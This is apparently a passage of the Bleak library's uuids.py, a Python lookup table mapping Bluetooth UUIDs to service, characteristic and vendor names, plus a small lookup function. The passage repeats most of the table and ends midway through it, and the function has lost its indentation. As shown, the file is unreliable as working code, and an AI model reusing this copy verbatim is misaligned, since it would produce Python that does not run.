0xfe5C: "million hunters GmbH",
0xfe5B: "GT-tronics HK Ltd",
0xfe5A: "Chronologics Corporation",
0xfe59: "Nordic Semiconductor ASA",
0xfe58: "Nordic Semiconductor ASA",
0xfe57: "Dotted Labs",
0xfe56: "Google Inc.",
0xfe55: "Google Inc.",
0xfe54: "Motiv: Inc.",
0xfe53: "3M",
0xfe52: "SetPoint Medical",
0xfe51: "SRAM",
0xfe50: "Google Inc.",
0xfe4F: "Molekule: Inc.",
0xfe4E: "NTT docomo",
0xfe4D: "Casambi Technologies Oy",
0xfe4C: "Volkswagen AG",
0xfe4B: "Koninklijke Philips N.V.",
0xfe4A: "OMRON HEALTHCARE Co.: Ltd.",
0xfe49: "SenionLab AB",
0xfe48: "General Motors",
0xfe47: "General Motors",
0xfe46: "B&O Play A/S",
0xfe45: "Snapchat Inc",
0xfe44: "SK Telecom",
0xfe43: "Andreas Stihl AG & Co. KG",
0xfe42: "Nets A/S",
0xfe41: "Inugo Systems Limited",
0xfe40: "Inugo Systems Limited",
0xfe3F: "Friday Labs Limited",
0xfe3E: "BD Medical",
0xfe3D: "BD Medical",
0xfe3C: "Alibaba",
0xfe3B: "Dolby Laboratories",
0xfe3A: "TTS Tooltechnic Systems AG & Co. KG",
0xfe39: "TTS Tooltechnic Systems AG & Co. KG",
0xfe38: "Spaceek LTD",
0xfe37: "Spaceek LTD",
0xfe36: "HUAWEI Technologies Co.: Ltd",
0xfe35: "HUAWEI Technologies Co.: Ltd",
0xfe34: "SmallLoop LLC",
0xfe33: "CHIPOLO d.o.o.",
0xfe32: "Pro-Mark: Inc.",
0xfe31: "Volkswagen AG",
0xfe30: "Volkswagen AG",
0xfe2F: "CRESCO Wireless: Inc",
0xfe2E: "ERi,Inc.",
0xfe2D: "SMART INNOVATION Co.,Ltd",
0xfe2C: "Google Inc.",
0xfe2B: "ITT Industries",
0xfe2A: "DaisyWorks: Inc.",
0xfe29: "Gibson Innovations",
0xfe28: "Ayla Network",
0xfe27: "Google Inc.",
0xfe26: "Google Inc.",
0xfe25: "Apple: Inc.",
0xfe24: "August Home Inc",
0xfe23: "Zoll Medical Corporation",
0xfe22: "Zoll Medical Corporation",
0xfe21: "Bose Corporation",
0xfe20: "Emerson",
0xfe1F: "Garmin International: Inc.",
0xfe1E: "Smart Innovations Co.: Ltd",
0xfe1D: "Illuminati Instrument Corporation",
0xfe1C: "NetMedia: Inc.",
# SDO defined */
0xfffc: "AirFuel Alliance",
0xfffe: "Alliance for Wireless Power (A4WP)",
0xfffd: "Fast IDentity Online Alliance (FIDO)",
}
uuid128_dict = {
"a3c87500-8ed3-4bdf-8a39-a01bebede295": "Eddystone Configuration Service",
"a3c87501-8ed3-4bdf-8a39-a01bebede295": "Capabilities",
"a3c87502-8ed3-4bdf-8a39-a01bebede295": "Active Slot",
"a3c87503-8ed3-4bdf-8a39-a01bebede295": "Advertising Interval",
"a3c87504-8ed3-4bdf-8a39-a01bebede295": "Radio Tx Power",
"a3c87505-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Advertised Tx Power",
"a3c87506-8ed3-4bdf-8a39-a01bebede295": "Lock State",
"a3c87507-8ed3-4bdf-8a39-a01bebede295": "Unlock",
"a3c87508-8ed3-4bdf-8a39-a01bebede295": "Public ECDH Key",
"a3c87509-8ed3-4bdf-8a39-a01bebede295": "EID Identity Key",
"a3c8750a-8ed3-4bdf-8a39-a01bebede295": "ADV Slot Data",
"a3c8750b-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Factory reset",
"a3c8750c-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Remain Connectable",
# BBC micro:bit Bluetooth Profiles */
"e95d0753-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Service",
"e95dca4b-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Data",
"e95dfb24-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Period",
"e95df2d8-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Service",
"e95dfb11-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Data",
"e95d386c-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Period",
"e95d9715-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Bearing",
"e95d9882-251d-470a-a062-fa1922dfa9a8": "MicroBit Button Service",
"e95dda90-251d-470a-a062-fa1922dfa9a8": "MicroBit Button A State",
"e95dda91-251d-470a-a062-fa1922dfa9a8": "MicroBit Button B State",
"e95d127b-251d-470a-a062-fa1922dfa9a8": "MicroBit IO PIN Service",
"e95d8d00-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN Data",
"e95d5899-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN AD Configuration",
"e95dd822-251d-470a-a062-fa1922dfa9a8": "MicroBit PWM Control",
"e95dd91d-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Service",
"e95d7b77-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Matrix state",
"e95d93ee-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Text",
"e95d0d2d-251d-470a-a062-fa1922dfa9a8": "MicroBit Scrolling Delay",
"e95d93af-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Service",
"e95db84c-251d-470a-a062-fa1922dfa9a8": "MicroBit Requirements",
"e95d9775-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Data",
"e95d23c4-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Requirements",
"e95d5404-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Events",
"e95d93b0-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control Service" "",
"e95d93b1-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control",
"e95d6100-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Service",
"e95d1b25-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Period",
# Nordic UART Port Emulation */
"6e400001-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART Service",
"6e400002-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART TX",
"6e400003-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART RX",
}
def uuidstr_to_str(uuid_):
s = uuid128_dict.get(uuid_)
if s:
return s
if not s and uuid_.endswith("-0000-1000-8000-00805f9b34fb"):
s = "Vendor specific"
v = int(uuid_[:8], 16)
if (v & 0xffff0000) == 0x0000:
s = uuid16_dict.get(v & 0x0000ffff, s)
if not s:
return "Unknown"
return s | bleak/uuids.py |
uuid16_dict = {
0x0001: "SDP",
0x0003: "RFCOMM",
0x0005: "TCS-BIN",
0x0007: "ATT",
0x0008: "OBEX",
0x000f: "BNEP",
0x0010: "UPNP",
0x0011: "HIDP",
0x0012: "Hardcopy Control Channel",
0x0014: "Hardcopy Data Channel",
0x0016: "Hardcopy Notification",
0x0017: "AVCTP",
0x0019: "AVDTP",
0x001b: "CMTP",
0x001e: "MCAP Control Channel",
0x001f: "MCAP Data Channel",
0x0100: "L2CAP",
# 0x0101 to 0x0fff undefined */
0x1000: "Service Discovery Server Service Class",
0x1001: "Browse Group Descriptor Service Class",
0x1002: "Public Browse Root",
# 0x1003 to 0x1100 undefined */
0x1101: "Serial Port",
0x1102: "LAN Access Using PPP",
0x1103: "Dialup Networking",
0x1104: "IrMC Sync",
0x1105: "OBEX Object Push",
0x1106: "OBEX File Transfer",
0x1107: "IrMC Sync Command",
0x1108: "Headset",
0x1109: "Cordless Telephony",
0x110a: "Audio Source",
0x110b: "Audio Sink",
0x110c: "A/V Remote Control Target",
0x110d: "Advanced Audio Distribution",
0x110e: "A/V Remote Control",
0x110f: "A/V Remote Control Controller",
0x1110: "Intercom",
0x1111: "Fax",
0x1112: "Headset AG",
0x1113: "WAP",
0x1114: "WAP Client",
0x1115: "PANU",
0x1116: "NAP",
0x1117: "GN",
0x1118: "Direct Printing",
0x1119: "Reference Printing",
0x111a: "Basic Imaging Profile",
0x111b: "Imaging Responder",
0x111c: "Imaging Automatic Archive",
0x111d: "Imaging Referenced Objects",
0x111e: "Handsfree",
0x111f: "Handsfree Audio Gateway",
0x1120: "Direct Printing Refrence Objects Service",
0x1121: "Reflected UI",
0x1122: "Basic Printing",
0x1123: "Printing Status",
0x1124: "Human Interface Device Service",
0x1125: "Hardcopy Cable Replacement",
0x1126: "HCR Print",
0x1127: "HCR Scan",
0x1128: "Common ISDN Access",
# 0x1129 and 0x112a undefined */
0x112d: "SIM Access",
0x112e: "Phonebook Access Client",
0x112f: "Phonebook Access Server",
0x1130: "Phonebook Access",
0x1131: "Headset HS",
0x1132: "Message Access Server",
0x1133: "Message Notification Server",
0x1134: "Message Access Profile",
0x1135: "GNSS",
0x1136: "GNSS Server",
0x1137: "3D Display",
0x1138: "3D Glasses",
0x1139: "3D Synchronization",
0x113a: "MPS Profile",
0x113b: "MPS Service",
# 0x113c to 0x11ff undefined */
0x1200: "PnP Information",
0x1201: "Generic Networking",
0x1202: "Generic File Transfer",
0x1203: "Generic Audio",
0x1204: "Generic Telephony",
0x1205: "UPNP Service",
0x1206: "UPNP IP Service",
0x1300: "UPNP IP PAN",
0x1301: "UPNP IP LAP",
0x1302: "UPNP IP L2CAP",
0x1303: "Video Source",
0x1304: "Video Sink",
0x1305: "Video Distribution",
# 0x1306 to 0x13ff undefined */
0x1400: "HDP",
0x1401: "HDP Source",
0x1402: "HDP Sink",
# 0x1403 to 0x17ff undefined */
0x1800: "Generic Access Profile",
0x1801: "Generic Attribute Profile",
0x1802: "Immediate Alert",
0x1803: "Link Loss",
0x1804: "Tx Power",
0x1805: "Current Time Service",
0x1806: "Reference Time Update Service",
0x1807: "Next DST Change Service",
0x1808: "Glucose",
0x1809: "Health Thermometer",
0x180a: "Device Information",
# 0x180b and 0x180c undefined */
0x180d: "Heart Rate",
0x180e: "Phone Alert Status Service",
0x180f: "Battery Service",
0x1810: "Blood Pressure",
0x1811: "Alert Notification Service",
0x1812: "Human Interface Device",
0x1813: "Scan Parameters",
0x1814: "Running Speed and Cadence",
0x1815: "Automation IO",
0x1816: "Cycling Speed and Cadence",
# 0x1817 undefined */
0x1818: "Cycling Power",
0x1819: "Location and Navigation",
0x181a: "Environmental Sensing",
0x181b: "Body Composition",
0x181c: "User Data",
0x181d: "Weight Scale",
0x181e: "Bond Management",
0x181f: "Continuous Glucose Monitoring",
0x1820: "Internet Protocol Support",
0x1821: "Indoor Positioning",
0x1822: "Pulse Oximeter",
0x1823: "HTTP Proxy",
0x1824: "Transport Discovery",
0x1825: "Object Transfer",
0x1826: "Fitness Machine",
0x1827: "Mesh Provisioning",
0x1828: "Mesh Proxy",
# 0x1829 to 0x27ff undefined */
0x2800: "Primary Service",
0x2801: "Secondary Service",
0x2802: "Include",
0x2803: "Characteristic",
# 0x2804 to 0x28ff undefined */
0x2900: "Characteristic Extended Properties",
0x2901: "Characteristic User Description",
0x2902: "Client Characteristic Configuration",
0x2903: "Server Characteristic Configuration",
0x2904: "Characteristic Format",
0x2905: "Characteristic Aggregate Formate",
0x2906: "Valid Range",
0x2907: "External Report Reference",
0x2908: "Report Reference",
0x2909: "Number of Digitals",
0x290a: "Value Trigger Setting",
0x290b: "Environmental Sensing Configuration",
0x290c: "Environmental Sensing Measurement",
0x290d: "Environmental Sensing Trigger Setting",
0x290e: "Time Trigger Setting",
# 0x290f to 0x29ff undefined */
0x2a00: "Device Name",
0x2a01: "Appearance",
0x2a02: "Peripheral Privacy Flag",
0x2a03: "Reconnection Address",
0x2a04: "Peripheral Preferred Connection Parameters",
0x2a05: "Service Changed",
0x2a06: "Alert Level",
0x2a07: "Tx Power Level",
0x2a08: "Date Time",
0x2a09: "Day of Week",
0x2a0a: "Day Date Time",
# 0x2a0b undefined */
0x2a0c: "Exact Time 256",
0x2a0d: "DST Offset",
0x2a0e: "Time Zone",
0x2a0f: "Local Time Information",
# 0x2a10 undefined */
0x2a11: "Time with DST",
0x2a12: "Time Accuracy",
0x2a13: "Time Source",
0x2a14: "Reference Time Information",
# 0x2a15 undefined */
0x2a16: "Time Update Control Point",
0x2a17: "Time Update State",
0x2a18: "Glucose Measurement",
0x2a19: "Battery Level",
# 0x2a1a and 0x2a1b undefined */
0x2a1c: "Temperature Measurement",
0x2a1d: "Temperature Type",
0x2a1e: "Intermediate Temperature",
# 0x2a1f and 0x2a20 undefined */
0x2a21: "Measurement Interval",
0x2a22: "Boot Keyboard Input Report",
0x2a23: "System ID",
0x2a24: "Model Number String",
0x2a25: "Serial Number String",
0x2a26: "Firmware Revision String",
0x2a27: "Hardware Revision String",
0x2a28: "Software Revision String",
0x2a29: "Manufacturer Name String",
0x2a2a: "IEEE 11073-20601 Regulatory Cert. Data List",
0x2a2b: "Current Time",
0x2a2c: "Magnetic Declination",
# 0x2a2d to 0x2a30 undefined */
0x2a31: "Scan Refresh",
0x2a32: "Boot Keyboard Output Report",
0x2a33: "Boot Mouse Input Report",
0x2a34: "Glucose Measurement Context",
0x2a35: "Blood Pressure Measurement",
0x2a36: "Intermediate Cuff Pressure",
0x2a37: "Heart Rate Measurement",
0x2a38: "Body Sensor Location",
0x2a39: "Heart Rate Control Point",
# 0x2a3a to 0x2a3e undefined */
0x2a3f: "Alert Status",
0x2a40: "Ringer Control Point",
0x2a41: "Ringer Setting",
0x2a42: "Alert Category ID Bit Mask",
0x2a43: "Alert Category ID",
0x2a44: "Alert Notification Control Point",
0x2a45: "Unread Alert Status",
0x2a46: "New Alert",
0x2a47: "Supported New Alert Category",
0x2a48: "Supported Unread Alert Category",
0x2a49: "Blood Pressure Feature",
0x2a4a: "HID Information",
0x2a4b: "Report Map",
0x2a4c: "HID Control Point",
0x2a4d: "Report",
0x2a4e: "Protocol Mode",
0x2a4f: "Scan Interval Window",
0x2a50: "PnP ID",
0x2a51: "Glucose Feature",
0x2a52: "Record Access Control Point",
0x2a53: "RSC Measurement",
0x2a54: "RSC Feature",
0x2a55: "SC Control Point",
0x2a56: "Digital",
# 0x2a57 undefined */
0x2a58: "Analog",
# 0x2a59 undefined */
0x2a5a: "Aggregate",
0x2a5b: "CSC Measurement",
0x2a5c: "CSC Feature",
0x2a5d: "Sensor Location",
# 0x2a5e to 0x2a62 undefined */
0x2a63: "Cycling Power Measurement",
0x2a64: "Cycling Power Vector",
0x2a65: "Cycling Power Feature",
0x2a66: "Cycling Power Control Point",
0x2a67: "Location and Speed",
0x2a68: "Navigation",
0x2a69: "Position Quality",
0x2a6a: "LN Feature",
0x2a6b: "LN Control Point",
0x2a6c: "Elevation",
0x2a6d: "Pressure",
0x2a6e: "Temperature",
0x2a6f: "Humidity",
0x2a70: "True Wind Speed",
0x2a71: "True Wind Direction",
0x2a72: "Apparent Wind Speed",
0x2a73: "Apparent Wind Direction",
0x2a74: "Gust Factor",
0x2a75: "Pollen Concentration",
0x2a76: "UV Index",
0x2a77: "Irradiance",
0x2a78: "Rainfall",
0x2a79: "Wind Chill",
0x2a7a: "Heat Index",
0x2a7b: "Dew Point",
0x2a7c: "Trend",
0x2a7d: "Descriptor Value Changed",
0x2a7e: "Aerobic Heart Rate Lower Limit",
0x2a7f: "Aerobic Threshold",
0x2a80: "Age",
0x2a81: "Anaerobic Heart Rate Lower Limit",
0x2a82: "Anaerobic Heart Rate Upper Limit",
0x2a83: "Anaerobic Threshold",
0x2a84: "Aerobic Heart Rate Upper Limit",
0x2a85: "Date of Birth",
0x2a86: "Date of Threshold Assessment",
0x2a87: "Email Address",
0x2a88: "Fat Burn Heart Rate Lower Limit",
0x2a89: "Fat Burn Heart Rate Upper Limit",
0x2a8a: "<NAME>",
0x2a8b: "Five Zone Heart Rate Limits",
0x2a8c: "Gender",
0x2a8d: "Heart Rate Max",
0x2a8e: "Height",
0x2a8f: "Hip Circumference",
0x2a90: "<NAME>",
0x2a91: "Maximum Recommended Heart Rate",
0x2a92: "Resting Heart Rate",
0x2a93: "Sport Type for Aerobic/Anaerobic Thresholds",
0x2a94: "Three Zone Heart Rate Limits",
0x2a95: "Two Zone Heart Rate Limit",
0x2a96: "VO2 Max",
0x2a97: "Waist Circumference",
0x2a98: "Weight",
0x2a99: "Database Change Increment",
0x2a9a: "User Index",
0x2a9b: "Body Composition Feature",
0x2a9c: "Body Composition Measurement",
0x2a9d: "Weight Measurement",
0x2a9e: "Weight Scale Feature",
0x2a9f: "User Control Point",
0x2aa0: "Magnetic Flux Density - 2D",
0x2aa1: "Magnetic Flux Density - 3D",
0x2aa2: "Language",
0x2aa3: "Barometric Pressure Trend",
0x2aa4: "Bond Management Control Point",
0x2aa5: "Bond Management Feature",
0x2aa6: "Central Address Resolution",
0x2aa7: "CGM Measurement",
0x2aa8: "CGM Feature",
0x2aa9: "CGM Status",
0x2aaa: "CGM Session Start Time",
0x2aab: "CGM Session Run Time",
0x2aac: "CGM Specific Ops Control Point",
0x2aad: "Indoor Positioning Configuration",
0x2aae: "Latitude",
0x2aaf: "Longitude",
0x2ab0: "Local North Coordinate",
0x2ab1: "Local East Coordinate",
0x2ab2: "Floor Number",
0x2ab3: "Altitude",
0x2ab4: "Uncertainty",
0x2ab5: "Location Name",
0x2ab6: "URI",
0x2ab7: "HTTP Headers",
0x2ab8: "HTTP Status Code",
0x2ab9: "HTTP Entity Body",
0x2aba: "HTTP Control Point",
0x2abb: "HTTPS Security",
0x2abc: "TDS Control Point",
0x2abd: "OTS Feature",
0x2abe: "Object Name",
0x2abf: "Object Type",
0x2ac0: "Object Size",
0x2ac1: "Object First-Created",
0x2ac2: "Object Last-Modified",
0x2ac3: "Object ID",
0x2ac4: "Object Properties",
0x2ac5: "Object Action Control Point",
0x2ac6: "Object List Control Point",
0x2ac7: "Object List Filter",
0x2ac8: "Object Changed",
0x2ac9: "Resolvable Private Address Only",
# 0x2aca and 0x2acb undefined */
0x2acc: "Fitness Machine Feature",
0x2acd: "Treadmill Data",
0x2ace: "Cross Trainer Data",
0x2acf: "Step Climber Data",
0x2ad0: "Stair Climber Data",
0x2ad1: "Rower Data",
0x2ad2: "Indoor Bike Data",
0x2ad3: "Training Status",
0x2ad4: "Supported Speed Range",
0x2ad5: "Supported Inclination Range",
0x2ad6: "Supported Resistance Level Range",
0x2ad7: "Supported Heart Rate Range",
0x2ad8: "Supported Power Range",
0x2ad9: "Fitness Machine Control Point",
0x2ada: "Fitness Machine Status",
0x2adb: "Mesh Provisioning Data In",
0x2adc: "Mesh Provisioning Data Out",
0x2add: "Mesh Proxy Data In",
0x2ade: "Mesh Proxy Data Out",
# vendor defined */
0xfeff: "GN Netcom",
0xfefe: "GN ReSound A/S",
0xfefd: "Gimbal: Inc.",
0xfefc: "Gimbal: Inc.",
0xfefb: "Stollmann E+V GmbH",
0xfefa: "PayPal: Inc.",
0xfef9: "PayPal: Inc.",
0xfef8: "Aplix Corporation",
0xfef7: "Aplix Corporation",
0xfef6: "Wicentric: Inc.",
0xfef5: "Dialog Semiconductor GmbH",
0xfef4: "Google",
0xfef3: "Google",
0xfef2: "CSR",
0xfef1: "CSR",
0xfef0: "Intel",
0xfeef: "Polar Electro Oy",
0xfeee: "Polar Electro Oy",
0xfeed: "Tile: Inc.",
0xfeec: "Tile: Inc.",
0xfeeb: "Swirl Networks: Inc.",
0xfeea: "Swirl Networks: Inc.",
0xfee9: "Quintic Corp.",
0xfee8: "Quintic Corp.",
0xfee7: "Tencent Holdings Limited",
0xfee6: "Seed Labs: Inc.",
0xfee5: "Nordic Semiconductor ASA",
0xfee4: "Nordic Semiconductor ASA",
0xfee3: "Anki: Inc.",
0xfee2: "Anki: Inc.",
0xfee1: "Anhui Huami Information Technology Co.",
0xfee0: "Anhui Huami Information Technology Co.",
0xfedf: "Design SHIFT",
0xfede: "Coin: Inc.",
0xfedd: "Jawbone",
0xfedc: "Jawbone",
0xfedb: "Perka: Inc.",
0xfeda: "ISSC Technologies Corporation",
0xfed9: "Pebble Technology Corporation",
0xfed8: "Google",
0xfed7: "Broadcom Corporation",
0xfed6: "Broadcom Corporation",
0xfed5: "Plantronics Inc.",
0xfed4: "Apple: Inc.",
0xfed3: "Apple: Inc.",
0xfed2: "Apple: Inc.",
0xfed1: "Apple: Inc.",
0xfed0: "Apple: Inc.",
0xfecf: "Apple: Inc.",
0xfece: "Apple: Inc.",
0xfecd: "Apple: Inc.",
0xfecc: "Apple: Inc.",
0xfecb: "Apple: Inc.",
0xfeca: "Apple: Inc.",
0xfec9: "Apple: Inc.",
0xfec8: "Apple: Inc.",
0xfec7: "Apple: Inc.",
0xfec6: "Kocomojo: LLC",
0xfec5: "Realtek Semiconductor Corp.",
0xfec4: "PLUS Location Systems",
0xfec3: "360fly: Inc.",
0xfec2: "Blue Spark Technologies: Inc.",
0xfec1: "KDDI Corporation",
0xfec0: "KDDI Corporation",
0xfebf: "Nod: Inc.",
0xfebe: "Bose Corporation",
0xfebd: "Clover Network: Inc.",
0xfebc: "Dexcom: Inc.",
0xfebb: "adafruit industries",
0xfeba: "Tencent Holdings Limited",
0xfeb9: "LG Electronics",
0xfeb8: "Facebook: Inc.",
0xfeb7: "Facebook: Inc.",
0xfeb6: "Vencer Co: Ltd",
0xfeb5: "WiSilica Inc.",
0xfeb4: "WiSilica Inc.",
0xfeb3: "Taobao",
0xfeb2: "Microsoft Corporation",
0xfeb1: "Electronics Tomorrow Limited",
0xfeb0: "Nest Labs Inc.",
0xfeaf: "Nest Labs Inc.",
0xfeae: "Nokia Corporation",
0xfead: "Nokia Corporation",
0xfeac: "Nokia Corporation",
0xfeab: "Nokia Corporation",
0xfeaa: "Google",
0xfea9: "Savant Systems LLC",
0xfea8: "Savant Systems LLC",
0xfea7: "UTC Fire and Security",
0xfea6: "GoPro: Inc.",
0xfea5: "GoPro: Inc.",
0xfea4: "Paxton Access Ltd",
0xfea3: "ITT Industries",
0xfea2: "Intrepid Control Systems: Inc.",
0xfea1: "Intrepid Control Systems: Inc.",
0xfea0: "Google",
0xfe9f: "Google",
0xfe9e: "Dialog Semiconductor B.V.",
0xfe9d: "Mobiquity Networks Inc",
0xfe9c: "GSI Laboratories: Inc.",
0xfe9b: "Samsara Networks: Inc",
0xfe9a: "Estimote",
0xfe99: "Currant: Inc.",
0xfe98: "Currant: Inc.",
0xfe97: "Tesla Motor Inc.",
0xfe96: "Tesla Motor Inc.",
0xfe95: "Xiaomi Inc.",
0xfe94: "OttoQ Inc.",
0xfe93: "OttoQ Inc.",
0xfe92: "Jarden Safety & Security",
0xfe91: "Shanghai Imilab Technology Co.,Ltd",
0xfe90: "JUMA",
0xfe8f: "CSR",
0xfe8e: "ARM Ltd",
0xfe8d: "Interaxon Inc.",
0xfe8c: "TRON Forum",
0xfe8b: "Apple: Inc.",
0xfe8a: "Apple: Inc.",
0xfe89: "B&O Play A/S",
0xfe88: "SALTO SYSTEMS S.L.",
0xfe87: "Qingdao Yeelink Information Technology Co.: Ltd. ( 青岛亿联客信息技术有限公司 )",
0xfe86: "HUAWEI Technologies Co.: Ltd. ( 华为技术有限公司 )",
0xfe85: "RF Digital Corp",
0xfe84: "RF Digital Corp",
0xfe83: "Blue Bite",
0xfe82: "Medtronic Inc.",
0xfe81: "Medtronic Inc.",
0xfe80: "Doppler Lab",
0xfe7f: "Doppler Lab",
0xfe7e: "Awear Solutions Ltd",
0xfe7d: "Aterica Health Inc.",
0xfe7c: "Stollmann E+V GmbH",
0xfe7b: "Orion Labs: Inc.",
0xfe7a: "Bragi GmbH",
0xfe79: "Zebra Technologies",
0xfe78: "Hewlett-Packard Company",
0xfe77: "Hewlett-Packard Company",
0xfe76: "TangoMe",
0xfe75: "TangoMe",
0xfe74: "unwire",
0xfe73: "St. Jude Medical: Inc.",
0xfe72: "St. Jude Medical: Inc.",
0xfe71: "Plume Design Inc",
0xfe70: "Beijing Jingdong Century Trading Co.: Ltd.",
0xfe6f: "LINE Corporation",
0xfe6e: "The University of Tokyo",
0xfe6d: "The University of Tokyo",
0xfe6c: "TASER International: Inc.",
0xfe6b: "TASER International: Inc.",
0xfe6a: "Kontakt Micro-Location Sp. z o.o.",
0xfe69: "Qualcomm Life Inc",
0xfe68: "Qualcomm Life Inc",
0xfe67: "Lab Sensor Solutions",
0xfe66: "Intel Corporation",
0xfe65: "CHIPOLO d.o.o.",
0xfe64: "Siemens AG",
0xfe63: "Connected Yard: Inc.",
0xfe62: "Indagem Tech LLC",
0xfe61: "Logitech International SA",
0xfe60: "Lierda Science & Technology Group Co.: Ltd.",
0xfe5F: "Eyefi: Inc.",
0xfe5E: "Plastc Corporation",
0xfe5D: "Grundfos A/S",
0xfe5C: "million hunters GmbH",
0xfe5B: "GT-tronics HK Ltd",
0xfe5A: "Chronologics Corporation",
0xfe59: "Nordic Semiconductor ASA",
0xfe58: "Nordic Semiconductor ASA",
0xfe57: "Dotted Labs",
0xfe56: "Google Inc.",
0xfe55: "Google Inc.",
0xfe54: "Motiv: Inc.",
0xfe53: "3M",
0xfe52: "SetPoint Medical",
0xfe51: "SRAM",
0xfe50: "Google Inc.",
0xfe4F: "Molekule: Inc.",
0xfe4E: "NTT docomo",
0xfe4D: "Casambi Technologies Oy",
0xfe4C: "Volkswagen AG",
0xfe4B: "Koninklijke Philips N.V.",
0xfe4A: "OMRON HEALTHCARE Co.: Ltd.",
0xfe49: "SenionLab AB",
0xfe48: "General Motors",
0xfe47: "General Motors",
0xfe46: "B&O Play A/S",
0xfe45: "Snapchat Inc",
0xfe44: "SK Telecom",
0xfe43: "Andreas Stihl AG & Co. KG",
0xfe42: "Nets A/S",
0xfe41: "Inugo Systems Limited",
0xfe40: "Inugo Systems Limited",
0xfe3F: "Friday Labs Limited",
0xfe3E: "BD Medical",
0xfe3D: "BD Medical",
0xfe3C: "Alibaba",
0xfe3B: "Dolby Laboratories",
0xfe3A: "TTS Tooltechnic Systems AG & Co. KG",
0xfe39: "TTS Tooltechnic Systems AG & Co. KG",
0xfe38: "Spaceek LTD",
0xfe37: "Spaceek LTD",
0xfe36: "HUAWEI Technologies Co.: Ltd",
0xfe35: "HUAWEI Technologies Co.: Ltd",
0xfe34: "SmallLoop LLC",
0xfe33: "CHIPOLO d.o.o.",
0xfe32: "Pro-Mark: Inc.",
0xfe31: "Volkswagen AG",
0xfe30: "Volkswagen AG",
0xfe2F: "CRESCO Wireless: Inc",
0xfe2E: "ERi,Inc.",
0xfe2D: "SMART INNOVATION Co.,Ltd",
0xfe2C: "Google Inc.",
0xfe2B: "ITT Industries",
0xfe2A: "DaisyWorks: Inc.",
0xfe29: "Gibson Innovations",
0xfe28: "Ayla Network",
0xfe27: "Google Inc.",
0xfe26: "Google Inc.",
0xfe25: "Apple: Inc.",
0xfe24: "August Home Inc",
0xfe23: "Zoll Medical Corporation",
0xfe22: "Zoll Medical Corporation",
0xfe21: "Bose Corporation",
0xfe20: "Emerson",
0xfe1F: "Garmin International: Inc.",
0xfe1E: "Smart Innovations Co.: Ltd",
0xfe1D: "Illuminati Instrument Corporation",
0xfe1C: "NetMedia: Inc.",
# SDO defined */
0xfffc: "AirFuel Alliance",
0xfffe: "Alliance for Wireless Power (A4WP)",
0xfffd: "Fast IDentity Online Alliance (FIDO)",
}
uuid128_dict = {
"a3c87500-8ed3-4bdf-8a39-a01bebede295": "Eddystone Configuration Service",
"a3c87501-8ed3-4bdf-8a39-a01bebede295": "Capabilities",
"a3c87502-8ed3-4bdf-8a39-a01bebede295": "Active Slot",
"a3c87503-8ed3-4bdf-8a39-a01bebede295": "Advertising Interval",
"a3c87504-8ed3-4bdf-8a39-a01bebede295": "Radio Tx Power",
"a3c87505-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Advertised Tx Power",
"a3c87506-8ed3-4bdf-8a39-a01bebede295": "Lock State",
"a3c87507-8ed3-4bdf-8a39-a01bebede295": "Unlock",
"a3c87508-8ed3-4bdf-8a39-a01bebede295": "Public ECDH Key",
"a3c87509-8ed3-4bdf-8a39-a01bebede295": "EID Identity Key",
"a3c8750a-8ed3-4bdf-8a39-a01bebede295": "ADV Slot Data",
"a3c8750b-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Factory reset",
"a3c8750c-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Remain Connectable",
# BBC micro:bit Bluetooth Profiles */
"e95d0753-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Service",
"e95dca4b-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Data",
"e95dfb24-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Period",
"e95df2d8-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Service",
"e95dfb11-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Data",
"e95d386c-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Period",
"e95d9715-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Bearing",
"e95d9882-251d-470a-a062-fa1922dfa9a8": "MicroBit Button Service",
"e95dda90-251d-470a-a062-fa1922dfa9a8": "MicroBit Button A State",
"e95dda91-251d-470a-a062-fa1922dfa9a8": "MicroBit Button B State",
"e95d127b-251d-470a-a062-fa1922dfa9a8": "MicroBit IO PIN Service",
"e95d8d00-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN Data",
"e95d5899-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN AD Configuration",
"e95dd822-251d-470a-a062-fa1922dfa9a8": "MicroBit PWM Control",
"e95dd91d-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Service",
"e95d7b77-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Matrix state",
"e95d93ee-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Text",
"e95d0d2d-251d-470a-a062-fa1922dfa9a8": "MicroBit Scrolling Delay",
"e95d93af-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Service",
